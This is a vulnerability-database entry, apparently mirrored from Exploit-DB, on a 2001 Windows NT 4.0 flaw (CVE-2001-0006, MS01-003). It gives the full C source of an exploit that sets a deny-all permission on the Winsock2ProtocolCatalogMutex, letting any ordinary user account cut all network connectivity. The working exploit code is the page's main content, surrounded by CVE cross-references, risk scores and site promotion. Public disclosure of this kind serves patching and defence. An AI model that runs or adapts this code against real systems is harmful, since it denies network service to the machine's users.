Lucene search
+L

Microsoft Windows NT 4.0 - Networking Mutex Denial of Service

🗓️ 24 Jan 2001 00:00:00Reported by Arne VidstromType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 34 Views

Microsoft Windows NT 4.0 is vulnerable to a denial of service via Mutex permission issues.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2001-0006
7 May 200104:00
cve
cvelist
Cvelist
CVE-2001-0006
7 May 200104:00
cvelist
nvd
NVD
CVE-2001-0006
12 Feb 200105:00
nvd
ptsecurity
Positive Technologies
PT-2001-1244 · Microsoft · Windows Nt 4.0
12 Feb 200100:00
ptsecurity
nessus
Tenable Nessus
MS01-003: Winsock2ProtocolCatalogMutex Mutex Local DoS (279336)
29 Jan 200100:00
nessus
cert
CERT
Microsoft Windows NT 4.0/TSE Winsock2ProtocolCatalogMutex has insecure permissions (MS01-003)
6 Feb 200100:00
cert
vulnrichment
Vulnrichment
CVE-2001-0006
7 May 200108:00
vulnrichment
// source: https://www.securityfocus.com/bid/2303/info

Microsoft Windows NT 4.0 is subject to a denial of service due to the implementation of incorrect permissions in a Mutex object. A local user could gain control of the Mutex on a networked machine and deny all network communication.

/*
/* mutation.c - (c) 2000, Arne Vidstrom, [email protected]
/*                        http://ntsecurity.nu
/*
/* - Disables all network connectivity through Winsock
/* - Can be run from any account (e.g. an ordinary User account)
/*
*/

#include <windows.h>
#include <aclapi.h>

int main(void)
{
	PSID pEveryoneSID;
	SID_IDENTIFIER_AUTHORITY iWorld = SECURITY_WORLD_SID_AUTHORITY;
	PACL pDacl;
	DWORD sizeNeeded;

	AllocateAndInitializeSid(&iWorld, 1, SECURITY_WORLD_RID, 0, 0, 0, 0, 0, 0, 0, &pEveryoneSID);
	sizeNeeded = sizeof(ACL) + sizeof(ACCESS_DENIED_ACE) + GetLengthSid(pEveryoneSID) - sizeof(DWORD);
	pDacl = (PACL) malloc(sizeNeeded);
	InitializeAcl(pDacl, sizeNeeded, ACL_REVISION);
	AddAccessDeniedAce(pDacl, ACL_REVISION, GENERIC_ALL, pEveryoneSID);
	SetNamedSecurityInfo("Winsock2ProtocolCatalogMutex", SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pDacl, NULL);
	free(pDacl);
	return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 22.1
CVSS 3.17.1
EPSS0.03002
SSVC
34